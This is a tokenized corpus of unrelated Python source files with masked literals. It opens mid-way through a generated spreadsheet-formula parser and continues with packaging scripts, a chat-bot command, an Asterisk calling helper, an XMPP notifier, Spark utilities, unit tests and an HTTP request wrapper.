] + struct . pack ( "<STR_LIT>" , pos2 - ( pos1 + <NUM_LIT:2> ) - <NUM_LIT:1> ) + self . rpn [ pos1 + <NUM_LIT:2> : ] <EOL> elif la1 and la1 in [ FUNC_CHOOSE ] : <EOL> pass <EOL> self . match ( FUNC_CHOOSE ) <EOL> arg_type = "<STR_LIT:R>" <EOL> rpn_chunks = [ ] <EOL> self . match ( LP ) <EOL> self . expr ( "<STR_LIT>" ) <EOL> rpn_start = len ( self . 
rpn ) <EOL> ref_markers = [ len ( self . sheet_references ) ] <EOL> while True : <EOL> if ( self . LA ( <NUM_LIT:1> ) == COMMA or self . LA ( <NUM_LIT:1> ) == SEMICOLON ) : <EOL> pass <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ SEMICOLON ] : <EOL> pass <EOL> self . match ( SEMICOLON ) <EOL> elif la1 and la1 in [ COMMA ] : <EOL> pass <EOL> self . match ( COMMA ) <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> mark = len ( self . rpn ) <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ TRUE_CONST , FALSE_CONST , STR_CONST , NUM_CONST , INT_CONST , FUNC_IF , FUNC_CHOOSE , NAME , QUOTENAME , SUB , LP , REF2D ] : <EOL> pass <EOL> self . expr ( arg_type ) <EOL> elif la1 and la1 in [ RP , COMMA , SEMICOLON ] : <EOL> pass <EOL> self . rpn += struct . pack ( "<STR_LIT:B>" , ptgMissArg ) <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> rpn_chunks . append ( self . rpn [ mark : ] ) <EOL> ref_markers . append ( len ( self . sheet_references ) ) <EOL> else : <EOL> break <EOL> self . match ( RP ) <EOL> self . rpn = self . rpn [ : rpn_start ] <EOL> nc = len ( rpn_chunks ) <EOL> chunklens = [ len ( chunk ) for chunk in rpn_chunks ] <EOL> skiplens = [ <NUM_LIT:0> ] * nc <EOL> skiplens [ - <NUM_LIT:1> ] = <NUM_LIT:3> <EOL> for ic in xrange ( nc - <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ) : <EOL> skiplens [ ic - <NUM_LIT:1> ] = skiplens [ ic ] + chunklens [ ic ] + <NUM_LIT:4> <EOL> jump_pos = [ <NUM_LIT:2> * nc + <NUM_LIT:2> ] <EOL> for ic in xrange ( nc ) : <EOL> jump_pos . append ( jump_pos [ - <NUM_LIT:1> ] + chunklens [ ic ] + <NUM_LIT:4> ) <EOL> chunk_shift = <NUM_LIT:2> * nc + <NUM_LIT:6> <EOL> for ic in xrange ( nc ) : <EOL> for refx in xrange ( ref_markers [ ic ] , ref_markers [ ic + <NUM_LIT:1> ] ) : <EOL> ref = self . 
sheet_references [ refx ] <EOL> self . sheet_references [ refx ] = ( ref [ <NUM_LIT:0> ] , ref [ <NUM_LIT:1> ] , ref [ <NUM_LIT:2> ] + chunk_shift ) <EOL> chunk_shift += <NUM_LIT:4> <EOL> choose_rpn = [ ] <EOL> choose_rpn . append ( struct . pack ( "<STR_LIT>" , ptgAttr , <NUM_LIT> , nc ) ) <EOL> choose_rpn . append ( struct . pack ( "<STR_LIT>" % ( nc + <NUM_LIT:1> ) , * jump_pos ) ) <EOL> for ic in xrange ( nc ) : <EOL> choose_rpn . append ( rpn_chunks [ ic ] ) <EOL> choose_rpn . append ( struct . pack ( "<STR_LIT>" , ptgAttr , <NUM_LIT> , skiplens [ ic ] ) ) <EOL> choose_rpn . append ( struct . pack ( "<STR_LIT>" , ptgFuncVarV , nc + <NUM_LIT:1> , <NUM_LIT:100> ) ) <EOL> self . rpn += "<STR_LIT>" . join ( choose_rpn ) <EOL> elif la1 and la1 in [ LP ] : <EOL> pass <EOL> self . match ( LP ) <EOL> self . expr ( arg_type ) <EOL> self . match ( RP ) <EOL> self . rpn += struct . pack ( "<STR_LIT:B>" , ptgParen ) <EOL> else : <EOL> if ( self . LA ( <NUM_LIT:1> ) == INT_CONST ) and ( _tokenSet_0 . member ( self . LA ( <NUM_LIT:2> ) ) ) : <EOL> pass <EOL> int_tok = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( INT_CONST ) <EOL> int_value = int ( int_tok . text ) <EOL> if int_value <= <NUM_LIT> : <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptgInt , int_value ) <EOL> else : <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptgNum , float ( int_value ) ) <EOL> elif ( self . LA ( <NUM_LIT:1> ) == REF2D ) and ( _tokenSet_0 . member ( self . LA ( <NUM_LIT:2> ) ) ) : <EOL> pass <EOL> ref2d_tok = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( REF2D ) <EOL> r , c = Utils . cell_to_packed_rowcol ( ref2d_tok . text ) <EOL> ptg = ptgRefR + _RVAdeltaRef [ arg_type ] <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptg , r , c ) <EOL> elif ( self . LA ( <NUM_LIT:1> ) == REF2D ) and ( self . LA ( <NUM_LIT:2> ) == COLON ) : <EOL> pass <EOL> ref2d1_tok = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( REF2D ) <EOL> self . match ( COLON ) <EOL> ref2d2_tok = self . 
LT ( <NUM_LIT:1> ) <EOL> self . match ( REF2D ) <EOL> r1 , c1 = Utils . cell_to_packed_rowcol ( ref2d1_tok . text ) <EOL> r2 , c2 = Utils . cell_to_packed_rowcol ( ref2d2_tok . text ) <EOL> ptg = ptgAreaR + _RVAdeltaArea [ arg_type ] <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptg , r1 , r2 , c1 , c2 ) <EOL> elif ( self . LA ( <NUM_LIT:1> ) == INT_CONST or self . LA ( <NUM_LIT:1> ) == NAME or self . LA ( <NUM_LIT:1> ) == QUOTENAME ) and ( self . LA ( <NUM_LIT:2> ) == COLON or self . LA ( <NUM_LIT:2> ) == BANG ) : <EOL> pass <EOL> sheet1 = self . sheet ( ) <EOL> sheet2 = sheet1 <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ COLON ] : <EOL> pass <EOL> self . match ( COLON ) <EOL> sheet2 = self . sheet ( ) <EOL> elif la1 and la1 in [ BANG ] : <EOL> pass <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> self . match ( BANG ) <EOL> ref3d_ref2d = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( REF2D ) <EOL> ptg = ptgRef3dR + _RVAdeltaRef [ arg_type ] <EOL> rpn_ref2d = "<STR_LIT>" <EOL> r1 , c1 = Utils . cell_to_packed_rowcol ( ref3d_ref2d . text ) <EOL> rpn_ref2d = struct . pack ( "<STR_LIT>" , <NUM_LIT> , r1 , c1 ) <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ COLON ] : <EOL> pass <EOL> self . match ( COLON ) <EOL> ref3d_ref2d2 = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( REF2D ) <EOL> ptg = ptgArea3dR + _RVAdeltaArea [ arg_type ] <EOL> r2 , c2 = Utils . cell_to_packed_rowcol ( ref3d_ref2d2 . text ) <EOL> rpn_ref2d = struct . pack ( "<STR_LIT>" , <NUM_LIT> , r1 , r2 , c1 , c2 ) <EOL> elif la1 and la1 in [ EOF , EQ , NE , GT , LT , GE , LE , ADD , SUB , MUL , DIV , POWER , PERCENT , RP , COMMA , SEMICOLON , CONCAT ] : <EOL> pass <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptg ) <EOL> self . 
sheet_references . append ( ( sheet1 , sheet2 , len ( self . rpn ) ) ) <EOL> self . rpn += rpn_ref2d <EOL> elif ( self . LA ( <NUM_LIT:1> ) == NAME ) and ( _tokenSet_0 . member ( self . LA ( <NUM_LIT:2> ) ) ) : <EOL> pass <EOL> name_tok = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( NAME ) <EOL> raise Exception ( "<STR_LIT>" % name_tok . txt ) <EOL> elif ( self . LA ( <NUM_LIT:1> ) == NAME ) and ( self . LA ( <NUM_LIT:2> ) == LP ) : <EOL> pass <EOL> func_tok = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( NAME ) <EOL> func_toku = func_tok . text . upper ( ) <EOL> if func_toku in all_funcs_by_name : <EOL> ( opcode , <EOL> min_argc , <EOL> max_argc , <EOL> func_type , <EOL> arg_type_str ) = all_funcs_by_name [ func_toku ] <EOL> arg_type_list = list ( arg_type_str ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" % func_tok . text ) <EOL> xcall = opcode < <NUM_LIT:0> <EOL> if xcall : <EOL> self . xcall_references . append ( ( func_toku , len ( self . rpn ) + <NUM_LIT:1> ) ) <EOL> self . rpn += struct . pack ( "<STR_LIT>" , <EOL> ptgNameXR , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> ) <EOL> self . match ( LP ) <EOL> arg_count = self . expr_list ( arg_type_list , min_argc , max_argc ) <EOL> self . match ( RP ) <EOL> if arg_count > max_argc or arg_count < min_argc : <EOL> raise Exception , "<STR_LIT>" % ( arg_count , func_tok . text ) <EOL> if xcall : <EOL> func_ptg = ptgFuncVarR + _RVAdelta [ func_type ] <EOL> self . rpn += struct . pack ( "<STR_LIT>" , func_ptg , arg_count + <NUM_LIT:1> , <NUM_LIT:255> ) <EOL> elif min_argc == max_argc : <EOL> func_ptg = ptgFuncR + _RVAdelta [ func_type ] <EOL> self . rpn += struct . pack ( "<STR_LIT>" , func_ptg , opcode ) <EOL> elif arg_count == <NUM_LIT:1> and func_tok . text . upper ( ) == "<STR_LIT>" : <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptgAttr , <NUM_LIT> , <NUM_LIT:0> ) <EOL> else : <EOL> func_ptg = ptgFuncVarR + _RVAdelta [ func_type ] <EOL> self . rpn += struct . 
pack ( "<STR_LIT>" , func_ptg , arg_count , opcode ) <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> def sheet ( self ) : <EOL> ref = None <EOL> sheet_ref_name = None <EOL> sheet_ref_int = None <EOL> sheet_ref_quote = None <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ NAME ] : <EOL> pass <EOL> sheet_ref_name = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( NAME ) <EOL> ref = sheet_ref_name . text <EOL> elif la1 and la1 in [ INT_CONST ] : <EOL> pass <EOL> sheet_ref_int = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( INT_CONST ) <EOL> ref = sheet_ref_int . text <EOL> elif la1 and la1 in [ QUOTENAME ] : <EOL> pass <EOL> sheet_ref_quote = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( QUOTENAME ) <EOL> ref = sheet_ref_quote . text [ <NUM_LIT:1> : - <NUM_LIT:1> ] . replace ( "<STR_LIT>" , "<STR_LIT:'>" ) <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> return ref <EOL> def expr_list ( self , <EOL> arg_type_list , min_argc , max_argc <EOL> ) : <EOL> arg_cnt = None <EOL> arg_cnt = <NUM_LIT:0> <EOL> arg_type = arg_type_list [ arg_cnt ] <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ TRUE_CONST , FALSE_CONST , STR_CONST , NUM_CONST , INT_CONST , FUNC_IF , FUNC_CHOOSE , NAME , QUOTENAME , SUB , LP , REF2D ] : <EOL> pass <EOL> self . expr ( arg_type ) <EOL> arg_cnt += <NUM_LIT:1> <EOL> while True : <EOL> if ( self . LA ( <NUM_LIT:1> ) == COMMA or self . LA ( <NUM_LIT:1> ) == SEMICOLON ) : <EOL> pass <EOL> if arg_cnt < len ( arg_type_list ) : <EOL> arg_type = arg_type_list [ arg_cnt ] <EOL> else : <EOL> arg_type = arg_type_list [ - <NUM_LIT:1> ] <EOL> if arg_type == "<STR_LIT:+>" : <EOL> arg_type = arg_type_list [ - <NUM_LIT:2> ] <EOL> la1 = self . 
LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ SEMICOLON ] : <EOL> pass <EOL> self . match ( SEMICOLON ) <EOL> elif la1 and la1 in [ COMMA ] : <EOL> pass <EOL> self . match ( COMMA ) <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ TRUE_CONST , FALSE_CONST , STR_CONST , NUM_CONST , INT_CONST , FUNC_IF , FUNC_CHOOSE , NAME , QUOTENAME , SUB , LP , REF2D ] : <EOL> pass <EOL> self . expr ( arg_type ) <EOL> elif la1 and la1 in [ RP , COMMA , SEMICOLON ] : <EOL> pass <EOL> self . rpn += struct . pack ( "<STR_LIT:B>" , ptgMissArg ) <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> arg_cnt += <NUM_LIT:1> <EOL> else : <EOL> break <EOL> elif la1 and la1 in [ RP ] : <EOL> pass <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> return arg_cnt <EOL> _tokenNames = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> def mk_tokenSet_0 ( ) : <EOL> data = [ <NUM_LIT> L , <NUM_LIT:0> L ] <EOL> return data <EOL> _tokenSet_0 = antlr . BitSet ( mk_tokenSet_0 ( ) ) </s>
<s> '''<STR_LIT>''' <EOL> import os <EOL> import sys <EOL> from setuptools import setup <EOL> about = { } <EOL> with open ( '<STR_LIT>' ) as f : <EOL> exec ( f . read ( ) , about ) <EOL> if sys . argv [ - <NUM_LIT:1> ] == '<STR_LIT:test>' : <EOL> status = os . system ( '<STR_LIT>' ) <EOL> status >>= <NUM_LIT:8> <EOL> sys . exit ( status ) <EOL> setup ( name = about [ '<STR_LIT>' ] , <EOL> version = about [ '<STR_LIT>' ] , <EOL> url = about [ '<STR_LIT>' ] , <EOL> license = about [ '<STR_LIT>' ] , <EOL> author = about [ '<STR_LIT>' ] , <EOL> author_email = about [ '<STR_LIT>' ] , <EOL> description = about [ '<STR_LIT>' ] , <EOL> long_description = __doc__ , <EOL> py_modules = [ '<STR_LIT>' ] , <EOL> zip_safe = False , <EOL> platforms = '<STR_LIT>' , <EOL> install_requires = [ '<STR_LIT>' ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] ) </s>
<s> from kaa import bot <EOL> from urllib import quote <EOL> import json <EOL> import requests <EOL> LINE_LIMIT = <NUM_LIT:1000> <EOL> @ bot . command ( '<STR_LIT:u>' ) <EOL> @ bot . command <EOL> def urbandict ( context ) : <EOL> url = '<STR_LIT>' <EOL> url = url . format ( quote ( context . args ) ) <EOL> r = requests . get ( url ) <EOL> data = json . loads ( r . content ) <EOL> if not data [ '<STR_LIT:list>' ] [ <NUM_LIT:0> ] . get ( '<STR_LIT>' ) : <EOL> return '<STR_LIT>' <EOL> data = data [ '<STR_LIT:list>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] . splitlines ( ) <EOL> data = '<STR_LIT:U+0020>' . join ( data ) <EOL> return data [ : LINE_LIMIT ] </s>
<s> try : <EOL> from setuptools import setup <EOL> except ImportError : <EOL> from distutils . core import setup <EOL> setup ( name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> license = '<STR_LIT>' , <EOL> test_suite = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> include_package_data = True , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> ) </s>
<s> import asterisk . manager <EOL> import threading <EOL> import datetime <EOL> import settings <EOL> from models import Call <EOL> def handle_shutdown ( event , manager ) : <EOL> manager . close ( ) <EOL> def handle_event ( event , manager , call ) : <EOL> if event . name == '<STR_LIT>' : <EOL> call . disposition = event . get_header ( '<STR_LIT>' ) <EOL> call . cause = event . get_header ( '<STR_LIT>' ) <EOL> call . duration = ( datetime . datetime . now ( ) - call . start ) . seconds <EOL> call . save ( ) <EOL> with manager . lock : <EOL> manager . lock . notifyAll ( ) <EOL> def make_call ( call ) : <EOL> manager = asterisk . manager . Manager ( ) <EOL> manager . lock = threading . Condition ( ) <EOL> try : <EOL> try : <EOL> call . start = datetime . datetime . now ( ) <EOL> manager . connect ( settings . AST_HOST ) <EOL> manager . login ( settings . AST_USER , settings . AST_PASS ) <EOL> manager . register_event ( '<STR_LIT>' , handle_shutdown ) <EOL> manager . register_event ( '<STR_LIT:*>' , lambda event , manager : handle_event ( event , manager , call ) ) <EOL> response = manager . originate ( call . channel , call . extension , call . context , settings . AST_PRIO , settings . AST_TIMEOUT_ORIGINATE * <NUM_LIT:1000> , call . caller_id ) <EOL> call . response = response . get_header ( '<STR_LIT>' ) <EOL> with manager . lock : <EOL> manager . lock . wait ( settings . AST_TIMEOUT_HANGUP ) <EOL> except asterisk . manager . ManagerSocketException , ( errno , reason ) : <EOL> msg = "<STR_LIT>" % reason <EOL> call . disposition = msg <EOL> raise <EOL> except asterisk . manager . ManagerAuthException , reason : <EOL> msg = "<STR_LIT>" % reason <EOL> call . disposition = msg <EOL> raise <EOL> except asterisk . manager . ManagerException , reason : <EOL> msg = "<STR_LIT>" % reason <EOL> call . disposition = msg <EOL> raise <EOL> finally : <EOL> call . save ( ) <EOL> manager . 
close ( ) <EOL> def call_all ( calls ) : <EOL> import logging <EOL> import time <EOL> start_time = time . time ( ) <EOL> answered = <NUM_LIT:0> <EOL> not_answered = <NUM_LIT:0> <EOL> errors = <NUM_LIT:0> <EOL> for call in calls : <EOL> try : <EOL> logging . info ( '<STR_LIT>' % ( call . related_object , call . channel , call . context ) ) <EOL> make_call ( call ) <EOL> if call . cause in ( '<STR_LIT:4>' , '<STR_LIT>' ) : <EOL> answered += <NUM_LIT:1> <EOL> else : <EOL> not_answered += <NUM_LIT:1> <EOL> except : <EOL> errors += <NUM_LIT:1> <EOL> logging . info ( "<STR_LIT>" % ( answered , not_answered , errors , time . time ( ) - start_time ) ) <EOL> return answered , not_answered , errors </s>
<s> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] </s>
<s> import logging <EOL> import config <EOL> import time <EOL> from sleekxmpp import ClientXMPP <EOL> from sleekxmpp . exceptions import IqError , IqTimeout <EOL> from . observer import Observer <EOL> class MyXMPPClient ( ClientXMPP ) : <EOL> def __init__ ( self ) : <EOL> logger = logging . getLogger ( "<STR_LIT>" ) <EOL> logger . setLevel ( logging . ERROR ) <EOL> ClientXMPP . __init__ ( self , config . xmpp_jid , config . xmpp_password ) <EOL> self . add_event_handler ( "<STR_LIT>" , self . session_start ) <EOL> self . add_event_handler ( "<STR_LIT:message>" , self . message ) <EOL> self . connect ( ) <EOL> self . process ( block = False ) <EOL> def session_start ( self , event ) : <EOL> self . send_presence ( ) <EOL> self . get_roster ( ) <EOL> def msend_message ( self , message ) : <EOL> logging . debug ( '<STR_LIT>' % ( message , <EOL> config . xmpp_to ) ) <EOL> self . send_message ( mto = config . xmpp_to , mbody = message , mtype = '<STR_LIT>' ) <EOL> def message ( self , msg ) : <EOL> pass <EOL> class XmppMessager ( Observer ) : <EOL> def __init__ ( self ) : <EOL> self . xmppclient = MyXMPPClient ( ) <EOL> def opportunity ( self , profit , volume , buyprice , kask , sellprice , kbid , perc , <EOL> weighted_buyprice , weighted_sellprice ) : <EOL> if profit > config . profit_thresh and perc > config . perc_thresh : <EOL> message = "<STR_LIT>" % ( profit , volume , buyprice , kask , sellprice , kbid , perc ) <EOL> self . xmppclient . msend_message ( message ) </s>
<s> import sys <EOL> import os <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT:..>' ) ) <EOL> import geoip2 <EOL> extensions = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = '<STR_LIT>' <EOL> copyright = '<STR_LIT>' <EOL> version = geoip2 . __version__ <EOL> release = geoip2 . __version__ <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> intersphinx_mapping = { '<STR_LIT>' : None } </s>
<s> from __future__ import absolute_import <EOL> from pyspark . sql import SQLContext <EOL> from pyspark . mllib . regression import LabeledPoint <EOL> from . . utils . rdd_utils import from_labeled_point , to_labeled_point , lp_to_simple_rdd <EOL> def to_data_frame ( sc , features , labels , categorical = False ) : <EOL> '''<STR_LIT>''' <EOL> lp_rdd = to_labeled_point ( sc , features , labels , categorical ) <EOL> sql_context = SQLContext ( sc ) <EOL> df = sql_context . createDataFrame ( lp_rdd ) <EOL> return df <EOL> def from_data_frame ( df , categorical = False , nb_classes = None ) : <EOL> '''<STR_LIT>''' <EOL> lp_rdd = df . rdd . map ( lambda row : LabeledPoint ( row . label , row . features ) ) <EOL> features , labels = from_labeled_point ( lp_rdd , categorical , nb_classes ) <EOL> return features , labels <EOL> def df_to_simple_rdd ( df , categorical = False , nb_classes = None , featuresCol = '<STR_LIT>' , labelCol = '<STR_LIT:label>' ) : <EOL> '''<STR_LIT>''' <EOL> sqlContext = df . sql_ctx <EOL> sqlContext . registerDataFrameAsTable ( df , "<STR_LIT>" ) <EOL> selected_df = sqlContext . sql ( "<STR_LIT>" . format ( featuresCol , labelCol ) ) <EOL> lp_rdd = selected_df . rdd . map ( lambda row : LabeledPoint ( row . label , row . features ) ) <EOL> rdd = lp_to_simple_rdd ( lp_rdd , categorical , nb_classes ) <EOL> return rdd </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> py2 = sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:2> <EOL> py3 = sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:3> <EOL> if py2 : <EOL> pass <EOL> elif py3 : <EOL> pass <EOL> def with_metaclass ( meta , * bases ) : <EOL> """<STR_LIT>""" <EOL> class MetaClass ( meta ) : <EOL> def __new__ ( cls , name , this_bases , dct ) : <EOL> return meta ( name , bases , dct ) <EOL> return type . __new__ ( MetaClass , '<STR_LIT>' , ( ) , { } ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from . import unittest , mock <EOL> from architect . databases . postgresql . partition import Partition , RangePartition <EOL> from architect . exceptions import ( <EOL> PartitionConstraintError , <EOL> PartitionRangeSubtypeError <EOL> ) <EOL> class BasePartitionTestCase ( object ) : <EOL> def setUp ( self ) : <EOL> model = mock . Mock ( __name__ = '<STR_LIT>' ) <EOL> defaults = { '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None } <EOL> self . partition = Partition ( model , ** defaults ) <EOL> self . range_partition = RangePartition ( model , ** dict ( constraint = '<STR_LIT:foo>' , subtype = '<STR_LIT:bar>' , ** defaults ) ) <EOL> @ unittest . skipUnless ( os . environ . get ( '<STR_LIT>' ) == '<STR_LIT>' , '<STR_LIT>' ) <EOL> class SQLitePartitionTestCase ( BasePartitionTestCase , unittest . TestCase ) : <EOL> pass <EOL> @ unittest . skipUnless ( os . environ . get ( '<STR_LIT>' ) == '<STR_LIT>' , '<STR_LIT>' ) <EOL> class PostgresqlPartitionTestCase ( BasePartitionTestCase , unittest . TestCase ) : <EOL> def test__get_definitions_not_implemented ( self ) : <EOL> self . assertRaises ( NotImplementedError , lambda : self . partition . _get_definitions ( ) ) <EOL> def test__get_definitions_raises_partition_range_subtype_error ( self ) : <EOL> self . assertRaises ( PartitionRangeSubtypeError , lambda : self . range_partition . _get_definitions ( ) ) <EOL> def test__get_date_definitions_raises_partition_constraint_error ( self ) : <EOL> self . range_partition . subtype = '<STR_LIT:date>' <EOL> self . assertRaises ( PartitionConstraintError , lambda : self . range_partition . _get_definitions ( ) ) <EOL> def test__get_integer_definitions_raises_partition_constraint_error ( self ) : <EOL> self . range_partition . subtype = '<STR_LIT>' <EOL> self . assertRaises ( PartitionConstraintError , lambda : self . range_partition . 
_get_definitions ( ) ) <EOL> def test__get_string_firstchars_definitions_raises_partition_constraint_error ( self ) : <EOL> self . range_partition . subtype = '<STR_LIT>' <EOL> self . assertRaises ( PartitionConstraintError , lambda : self . range_partition . _get_definitions ( ) ) <EOL> def test__get_string_lastchars_definitions_raises_partition_constraint_error ( self ) : <EOL> self . range_partition . subtype = '<STR_LIT>' <EOL> self . assertRaises ( PartitionConstraintError , lambda : self . range_partition . _get_definitions ( ) ) <EOL> @ unittest . skipUnless ( os . environ . get ( '<STR_LIT>' ) == '<STR_LIT>' , '<STR_LIT>' ) <EOL> class MysqlPartitionTestCase ( BasePartitionTestCase , unittest . TestCase ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from . import sessions <EOL> def request ( method , url , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> with sessions . Session ( ) as session : <EOL> return session . request ( method = method , url = url , ** kwargs ) <EOL> def get ( url , params = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> kwargs . setdefault ( '<STR_LIT>' , True ) <EOL> return request ( '<STR_LIT>' , url , params = params , ** kwargs ) <EOL> def options ( url , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> kwargs . setdefault ( '<STR_LIT>' , True ) <EOL> return request ( '<STR_LIT>' , url , ** kwargs ) <EOL> def head ( url , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> kwargs . setdefault ( '<STR_LIT>' , False ) <EOL> return request ( '<STR_LIT>' , url , ** kwargs ) <EOL> def post ( url , data = None , json = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return request ( '<STR_LIT>' , url , data = data , json = json , ** kwargs ) <EOL> def put ( url , data = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return request ( '<STR_LIT>' , url , data = data , ** kwargs ) <EOL> def patch ( url , data = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return request ( '<STR_LIT>' , url , data = data , ** kwargs ) <EOL> def delete ( url , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return request ( '<STR_LIT>' , url , ** kwargs ) </s>
